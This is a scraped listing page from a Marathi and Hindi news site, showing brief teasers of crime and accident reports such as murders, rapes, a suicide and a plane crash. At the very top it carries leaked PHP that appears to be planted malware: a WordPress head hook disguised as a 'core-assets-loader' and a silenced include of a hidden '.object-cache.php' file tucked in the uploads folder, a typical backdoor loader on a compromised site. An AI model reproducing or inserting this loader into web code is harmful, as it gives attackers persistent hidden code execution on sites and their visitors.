add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अपराध समाचार – SOCH INDIA
Menu

घरगुती कलह विकोपाला गेल्यानंतर जन्मदात्या वडिलांकडून मुलाची हत्या झाल्याची घटना चंद्रपुरात घडली आहे. हत्या केल्यानंतर स्वतः वडिलांनी पोलिसांत जाऊन आत्मसमर्पण केलं आहे. बल्लारपूर येथील विद्यानगर वॉर्डात ही थरारक घटना सकाळी घडली. राहुल सोपान नगराळे (वय ४२) असं मृतकाचे नाव आहे तर सोपान नगराळे (वय ७४) असे आरोपी पित्याचे नाव...

Read More

हैदराबादधील बलात्काराचे प्रकरण ताजे असतानाच गुरुवारी पश्चिम बंगालच्या मालदा जिल्ह्य़ातील आंब्याच्या बागेत एका महिलेचा जळलेल्या अवस्थेतील मृतदेह मिळाल्याने खळबळ माजली आहे. या महिलेवर बलात्कार करून त्यानंतर तिला जाळण्यात आले असावे, असा संशय एका पोलीस अधिकाऱ्याने व्यक्त केला आहे. या महिलेचा मृतदेह जळल्याने तिची ओळख पटविण्यात अडचणी निर्माण झाल्या आहेत,...

Read More

आसन देण्यावरून झालेल्या वादामुळे एका प्रवाशाला उपनगरी रेल्वेमधून ढकलल्याचा प्रकार कुर्ला रेल्वे स्थानकाजवळ गुरुवारी घडला. विजयकुमार गुप्ता (वय ३५, रा. मानखुर्द) असे या प्रवाशाचे नाव असून, यात ते गंभीर जखमी झाले आहेत. गुप्ता हे सकाळी ८.५२ वाजता मानखुर्द येथून सीएसएमटीकडे जाणाऱ्या उपनगरी रेल्वेतून प्रवास करीत होते. या प्रवासादरम्यान आसन...

Read More

पश्चिम बंगालमधील दार्जिलिंग जिल्ह्यातील एका सरकारी शाळेमधील ५१ वर्षाच्या शिक्षकाने सहा वर्षीय मुलीवर बलात्कार केल्याची धक्कादायक घटना घडली आहे. प्राथमिक शाळेच्या वर्गामध्येच या शिक्षकाने दुष्कृत्य केल्याची माहिती पोलिस समोर आली आहे. याप्रकरणी पोलिसांनी चंद्रमन खवस या व्यक्तीला अटक केली आहे. लहान मुलांवरील लैंगिक अत्याचार प्रतिबंधक कायद्याअंतर्गत म्हणजेच पोस्कोअंतर्गत अटक...

Read More

हैदराबाद, उन्नाव के बाद अब पश्चिम बंगाल के मालदा में एक युवती का जला हुआ शव मिला है. फिलहाल शव की शिनाख़्त नहीं हो पाई है. पुलिस के मुताबिक शव के पोस्टमार्टम के बाद ही बलात्कार की पुष्टि हो पाएगी. हालांकि आशंका जताई जा रही है कि महिला के...

Read More

लग्नानंतर अवघ्या ११ दिवसात तरुणीने राहत्या घरी गळफास घेऊन आत्महत्या केली. पूर्णिमा (२२) असे मृत तरुणीचे नाव आहे. हैदराबादच्या सनातनगरमध्ये मंगळवारी ही घटना घडली. पेशाने सॉफ्टवेअर इंजिनिअर असलेल्या पूर्णिमाने आई-वडिलांच्या इच्छेविरोधात जाऊन लग्न केले होते. पूर्णिमाच्या आई-वडिलांनी पोलिसांशी बोलताना मुलीच्या मृत्यूसाठी नवऱ्याला जबाबदार धरले आहे. पूर्णिमा आणि कार्तिकचे २२...

Read More

अमेरिकेच्या साऊथ डकोटा येथे शनिवारी रात्री एका प्रवासी विमानाला भीषण अपघात झाल्याचे वृत्त आहे. या दुर्घटनेत नऊ प्रवाशांचा मृत्यू झाला असून तीन जण गंभीर जखमी झाले आहेत. या विमानातून १२ लोक प्रवास करीत होते. चेंबरलेन येथून उड्डाण करुन हे विमान इदाहो फॉल्सकडे निघाले होते. ट्रान्सपोर्टेशन सेफ्टी बोर्डाच्या माहितीनुसार, विमानाच्या...

Read More

दुचाकीस्वाराने गाडी थांबवली नाही म्हणून पोलीस अधिकाऱ्याने त्याला रोखण्यासाठी लाठी फेकून मारली. पोलिसाची लाठी लागून दुचाकीस्वाराचा बॅलन्स गेला व विरुद्ध दिशेने येणाऱ्या कारवर जाऊन त्याची बाईक आदळली. या अपघातात सिद्दिकीच्या डोक्याला गंभीर मार लागला आहे. केरळच्या कोल्लममध्ये ही घटना घडली. पोलीस अधिकारी चंद्रमोहन कोल्लममध्ये वाहनांची तपासणी करत असताना सिद्दिकी...

Read More

वाढदिवसाच्या दिवशीच प्रियकराने प्रेयसीवर बलात्कार करुन तिची हत्या केली. हैदराबादच्या वारंगल जिल्ह्यात ही धक्कादायक घटना घडली. तरुणीचा मृत्यू नैसर्गिक झाल्याचे दाखवण्याचा प्रयत्न करणाऱ्या प्रियकराला पोलिसांनी अटक केली आहे. मृत तरुणीचा बुधवारी वाढदिवस होता. आरोपीने तिला फोन करुन भेटायला बोलावले. वनइंडिया वेबसाइटने हे वृत्त दिले आहे. आपण मंदिरात चाललोय असे...

Read More

मुंबई-पुणे एक्स्प्रेस वेवर भीषण अपघात झाला आहे. टँकरला स्विफ्ट कारने मागून धडक दिली असून या अपघातात चौघांचा मृत्यू झाला आहे. तर अपघातात दोघे गंभीर जखमी झाले आहेत. मुंबईवरील लेनवर हा अपघात झाला. रसायनी पोलीस ठाण्याच्या हद्दीत ही भीषण अपघात झाला. मृतांमध्ये तीन महिला आणि दोन पुरुषांचा समावेश आहे. अपघातानंतर...

Read More